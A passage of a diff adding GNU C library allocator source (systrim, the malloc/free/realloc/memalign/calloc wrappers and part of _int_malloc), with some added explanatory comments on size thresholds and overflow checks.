+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
+
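+/* The trim threshold starts at DEFAULT_TRIM_THRESHOLD (128 KiB) and,
+   like the mmap threshold, may be raised dynamically; see the
+   threshold adjustment in __libc_free below.  */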
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
+         This avoids problems if first call releases less than we asked,
+         or if failure somehow altered the brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
+
+static void
+internal_function
+munmap_chunk (mchunkptr p)
+{
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  /* Do nothing if the chunk is a faked mmapped chunk in the dumped
+     main arena.  We never free this memory.  */
+  if (DUMPED_MAIN_ARENA_CHUNK (p))
+    return;
+
+  uintptr_t block = (uintptr_t) p - prev_size (p);
+  size_t total_size = prev_size (p) + size;
+  /* Unfortunately we have to do the compiler's job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (at the moment, at least) so we combine the two values into one before
+     the bit test.  */
+  if (__builtin_expect (((block | total_size) & (GLRO (dl_pagesize) - 1)) != 0, 0))
+    {
+      malloc_printerr (check_action, "munmap_chunk(): invalid pointer",
+                       chunk2mem (p), NULL);
+      return;
+    }
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
+
+#if HAVE_MREMAP
+
+static mchunkptr
+internal_function
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = prev_size (p);
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+  assert (((size + offset) & (GLRO (dl_pagesize) - 1)) == 0);
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (size + offset == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) p - offset, size + offset, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert (prev_size (p) == offset);
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* See if the dynamic brk/mmap threshold needs adjusting.
+	 Dumped fake mmapped chunks do not affect the threshold.  */
+      if (!mp_.no_dyn_threshold
+          && chunksize_nomask (p) > mp_.mmap_threshold
+          && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX
+	  && !DUMPED_MAIN_ARENA_CHUNK (p))
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    ar_ptr = arena_for_chunk (oldp);
+
+  /* Little security check which won't hurt performance: the allocator
+     never wraps around at the end of the address space.  Therefore
+     we can exclude some size values which might appear here by
+     accident or by "design" from some intruder.  We need to bypass
+     this check for dumped fake mmap chunks from the old main arena
+     because the new malloc may provide additional alignment.  */
+  if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+       || __builtin_expect (misaligned_chunk (oldp), 0))
+      && !DUMPED_MAIN_ARENA_CHUNK (oldp))
+    {
+      malloc_printerr (check_action, "realloc(): invalid pointer", oldmem,
+		       ar_ptr);
+      return NULL;
+    }
+
+  checked_request2size (bytes, nb);
+
+  if (chunk_is_mmapped (oldp))
+    {
+      /* If this is a faked mmapped chunk from the dumped main arena,
+	 always make a copy (and do not free the old chunk).  */
+      if (DUMPED_MAIN_ARENA_CHUNK (oldp))
+	{
+	  /* Must alloc, copy, free. */
+	  void *newmem = __libc_malloc (bytes);
+	  if (newmem == 0)
+	    return NULL;
+	  /* Copy as many bytes as are available from the old chunk
+	     and fit into the new size.  NB: The overhead for faked
+	     mmapped chunks is only SIZE_SZ, not 2 * SIZE_SZ as for
+	     regular mmapped chunks.  */
+	  if (bytes > oldsize - SIZE_SZ)
+	    bytes = oldsize - SIZE_SZ;
+	  memcpy (newmem, oldmem, bytes);
+	  return newmem;
+	}
+
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  __libc_lock_lock (ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  __libc_lock_unlock (ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes = ALIGN_UP (bytes, pagesize);
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - 2 * pagesize - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T bytes, sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+
+  /* size_t is unsigned so the behavior on overflow is defined.  */
+  bytes = n * elem_size;
+#define HALF_INTERNAL_SIZE_T \
+  (((INTERNAL_SIZE_T) 1) << (8 * sizeof (INTERNAL_SIZE_T) / 2))
+  if (__builtin_expect ((n | elem_size) >= HALF_INTERNAL_SIZE_T, 0))
+    {
+      if (elem_size != 0 && bytes / elem_size != n)
+        {
+          __set_errno (ENOMEM);
+          return 0;
+        }
+    }
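+  /* The (n | elem_size) test is a cheap filter: when both values fit in
+     the low half of INTERNAL_SIZE_T (e.g. both below 2^32 on a 64-bit
+     build) their product cannot wrap, so the division check above runs
+     only in the rare case where overflow is actually possible.  */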
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      sz = bytes;
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  sz = bytes;
+
+  arena_get (av, sz);
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (mem == 0 && av != NULL)
+    {
+      LIBC_PROBE (memory_calloc_retry, 1, sz);
+      av = arena_get_retry (av, sz);
+      mem = _int_malloc (av, sz);
+    }
+
+  if (av != NULL)
+    __libc_lock_unlock (av->mutex);
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8-byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
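+  /* (The smallest chunk is MINSIZE == 4 * SIZE_SZ and clearsize is
+     csz - SIZE_SZ, giving 3 words; chunk sizes then grow in steps of
+     MALLOC_ALIGNMENT == 2 * SIZE_SZ in the usual configuration, so the
+     word count stays odd.)  */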
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+  const char *errstr = NULL;
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size traps (returning 0) request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
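+  /* For example, on a typical 64-bit build (SIZE_SZ == 8,
+     MALLOC_ALIGNMENT == 16, MINSIZE == 32) a request of 24 bytes
+     yields nb == 32, while a request of 25 bytes yields nb == 48.  */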
+  checked_request2size (bytes, nb);
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
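+  /* On a 64-bit build DEFAULT_MXFAST works out to 128-byte chunks, so
+     by default requests of up to 120 bytes (chunk sizes 32 to 128,
+     mapped by fastbin_index to bins 0 through 6) take this path.  */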
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp = *fb;
+      do
+        {
+          victim = pp;
+          if (victim == NULL)
+            break;
+        }
+      while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim))
+             != victim);
+      if (victim != 0)
+        {
+          if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0))
+            {
+              errstr = "malloc(): memory corruption (fast)";
+            errout:
+              malloc_printerr (check_action, errstr, chunk2mem (victim), av);
+              return NULL;
+            }
+          check_remalloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          if (victim == 0) /* initialization check */
+            malloc_consolidate (av);
+          else
+            {
+              bck = victim->bk;
+              if (__glibc_unlikely (bck->fd != victim))
+                {
+                  errstr = "malloc(): smallbin double linked list corrupted";
+                  goto errout;
+                }
+              set_inuse_bit_at_offset (victim, nb);
+              bin->bk = bck;
+              bck->fd = bin;
+
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs. And the programs that
+     it is called frequently in otherwise tend to fragment.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (have_fastchunks (av))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is an exact fit, or, if this is a small request, the chunk is the remainder from
+     the most recent non-exact fit.  Place other traversed chunks in
+     bins.  Note that this step is the only place in any routine where
+     chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          if (__builtin_expect (chunksize_nomask (victim) <= 2 * SIZE_SZ, 0)
+              || __builtin_expect (chunksize_nomask (victim)
+				   > av->system_mem, 0))
+            malloc_printerr (check_action, "malloc(): memory corruption",
+                             chunk2mem (victim), av);
+          size = chunksize (victim);
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert (chunk_main_arena (bck->bk));
+                  if ((unsigned long) (size)
+		      < (unsigned long) chunksize_nomask (bck->bk))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert (chunk_main_arena (fwd));
+                      while ((unsigned long) size < chunksize_nomask (fwd))
+                        {
+                          fwd = fwd->fd_nextsize;
+			  assert (chunk_main_arena (fwd));
+                        }
+
+                      if ((unsigned long) size
+			  == (unsigned long) chunksize_nomask (fwd))
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin
+	      && (unsigned long) chunksize_nomask (victim)
+	        >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin)
+		  && chunksize_nomask (victim)
+		    == chunksize_nomask (victim->fd))
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+                  if (__glibc_unlikely (fwd->bk != bck))
+                    {
+                      errstr = "malloc(): corrupted unsorted chunks";
+                      goto errout;
+                    }
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+                  if (__glibc_unlikely (fwd->bk != bck))
+                    {
+                      errstr = "malloc(): corrupted unsorted chunks 2";
+                      goto errout;
+                    }
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
